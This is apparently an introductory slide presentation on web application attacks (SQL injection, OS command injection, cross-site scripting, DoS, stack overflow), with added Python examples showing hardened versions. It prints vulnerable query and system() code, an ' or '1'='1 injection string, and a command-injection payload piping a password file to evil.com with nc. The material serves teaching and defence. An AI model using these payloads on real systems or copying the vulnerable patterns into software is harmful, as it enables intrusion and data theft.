Web application attack Presentation
Web Application Attack
Nguyễn Kiều Khoa
What is a web application?
- A web application or web app is any software that runs in a web browser. It is created in a browser-supported programming language (such as the combination of JavaScript, HTML and CSS) and relies on a web browser to render the application.
http://en.wikipedia.org/wiki/Web_application
1.Injection (SQL Injection)
db.ExecuteReader("select * from users where name='" + Request["user"] + "' and password='" + Request["password"] + "'");
- Suppose the user request parameter is …' or '1'='1
- Then the query we execute is … (note that AND binds tighter than OR, so the condition parses as name='' OR ('1'='1' AND password='whatever'))
select * from users where name='' or '1'='1' and password='whatever'
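To make the slide's two points checkable, here is an added Python example (not code from the presentation) using the standard sqlite3 module: it builds the concatenated query exactly as the slide does, evaluates it against a small constructed users table, and contrasts it with a parameterized query. The table contents and the function names (build_concatenated, login_concatenated, login_parameterized) are assumptions made for this example.

```python
import sqlite3


def make_db():
    """Constructed sample table (not data from the presentation)."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users (name text, password text)")
    con.executemany("insert into users values (?, ?)",
                    [("alice", "s3cret"), ("O'Brien", "pa55")])
    return con


def build_concatenated(user, password):
    """The slide's pattern: untrusted input is spliced into the SQL text."""
    return ("select * from users where name='" + user +
            "' and password='" + password + "'")


def login_concatenated(con, user, password):
    return con.execute(build_concatenated(user, password)).fetchall()


def login_parameterized(con, user, password):
    """Hardened form: the driver binds the placeholders, so the input is
    always compared as a value and never parsed as SQL."""
    sql = "select * from users where name=? and password=?"
    return con.execute(sql, (user, password)).fetchall()


PAYLOAD = "' or '1'='1"   # the user parameter from the slide


def demo():
    con = make_db()
    results = {}
    # 1. The spliced query text is exactly the one shown on the slide.
    results["sql"] = build_concatenated(PAYLOAD, "whatever")
    # 2. SQL evaluates it as name='' OR ('1'='1' AND password='whatever'),
    #    so the structure of the query, not the stored data, decides the
    #    outcome; with a non-matching password no row comes back.
    results["concat_rows"] = len(login_concatenated(con, PAYLOAD, "whatever"))
    # 3. With bound parameters the literal string "' or '1'='1" is compared
    #    to the name column and matches nothing.
    results["param_rows"] = len(login_parameterized(con, PAYLOAD, "whatever"))
    # 4. Concatenation also breaks on a legitimate name containing a quote...
    try:
        login_concatenated(con, "O'Brien", "pa55")
        results["concat_quote_ok"] = True
    except sqlite3.OperationalError:   # syntax error: unterminated string
        results["concat_quote_ok"] = False
    # ...while the parameterized query handles it without special casing.
    results["param_quote_rows"] = len(login_parameterized(con, "O'Brien", "pa55"))
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

The apostrophe case is the practical tell: code that cannot log in O'Brien is code whose query structure depends on user input, which is the same property the injected quote on the slide exploits.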
1.Injection (OS Command)
- Suppose we're too lazy to perform DNS lookup, so we resort to the following:
system("nslookup " + Request["hostname"]);
- Suppose the hostname parameter is …
foo || cat /etc/password | nc evil.com
- Then we end up sending the password file to evil.com
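The following Python example is added here and is not part of the presentation. It shows the two controls that close the hole on the slide: an allow-list check on the hostname before it is used, and execution as an argument vector with no shell so that metacharacters are delivered to the program as plain data. To run offline it echoes the argument through a Python one-liner instead of calling nslookup; the regex, the function names and that substitution are assumptions of the example.

```python
import re
import subprocess
import sys

# Allow-list for a DNS name: labels of letters, digits and hyphens joined by
# dots. Shell metacharacters such as '|', '&', ';' or spaces cannot pass it.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def build_shell_command(hostname):
    """The slide's pattern: a single string that a shell will interpret."""
    return "nslookup " + hostname


def build_argv(hostname):
    """Hardened form: validate first, then build an argument vector."""
    if not HOSTNAME_RE.match(hostname):
        raise ValueError("not a valid hostname: %r" % hostname)
    return ["nslookup", hostname]


def run_without_shell(argv_tail):
    """Run without a shell so every element of argv_tail is one argument.
    (A Python one-liner stands in for nslookup so this works offline.)"""
    argv = [sys.executable, "-c", "import sys; print(sys.argv[1])"] + argv_tail
    completed = subprocess.run(argv, capture_output=True, text=True, check=True)
    return completed.stdout.rstrip("\n")


PAYLOAD = "foo || cat /etc/password | nc evil.com"  # the hostname from the slide


def demo():
    results = {"shell_string": build_shell_command(PAYLOAD)}
    try:
        build_argv(PAYLOAD)
        results["rejected"] = False
    except ValueError:
        results["rejected"] = True
    results["valid_argv"] = build_argv("example.com")
    # Even without validation, the vector form never gives '||' or '|' to a
    # shell: the child program receives the whole string as one argument.
    results["literal_echo"] = run_without_shell([PAYLOAD])
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

Both controls matter: the allow-list stops junk from reaching nslookup at all, and the argv form removes the shell, which is the component that turned the slide's string into three separate commands.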
2.Cross-Site Scripting
- Injecting JavaScript into pages viewed by other users.
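As an added example (not from the presentation), the Python code below renders a user comment into an HTML page twice: once pasted in raw, as the slide describes, and once passed through html.escape for the HTML text context. The page template, the sample comment and the function names are constructed for this example.

```python
import html

# Fixed page template; only the two values are untrusted.
PAGE = "<p>Comment from {author}: {body}</p>"


def render_unescaped(author, body):
    """The risky pattern: user text is placed straight into the HTML,
    so any markup in it is parsed and any script in it runs for every
    visitor who views the page."""
    return PAGE.format(author=author, body=body)


def render_escaped(author, body):
    """Hardened form: encode every untrusted value for the HTML text
    context, so the browser shows the characters instead of parsing them."""
    return PAGE.format(author=html.escape(author, quote=True),
                       body=html.escape(body, quote=True))


# Constructed sample comment, not from the presentation.
COMMENT = '<script>alert("hi")</script>'


def demo():
    unescaped = render_unescaped("guest", COMMENT)
    escaped = render_escaped("guest", COMMENT)
    return {
        "unescaped_has_script_tag": "<script>" in unescaped,
        "escaped_has_script_tag": "<script>" in escaped,
        "escaped": escaped,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

html.escape is correct only for the HTML text (and quoted attribute) context; a value placed inside a script block, a URL or a CSS rule needs the encoding for that context instead, which is why templating engines that escape by default are the usual fix rather than hand-placed calls.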
3.DoS and DDoS
- A denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users.
http://en.wikipedia.org/wiki/Denial-of-service_attack
4.Stack Overflow
- A stack buffer overflow or stack buffer overrun occurs when a program writes to a memory address on the program's call stack outside of the intended data structure, which is usually a fixed-length buffer.
Q&A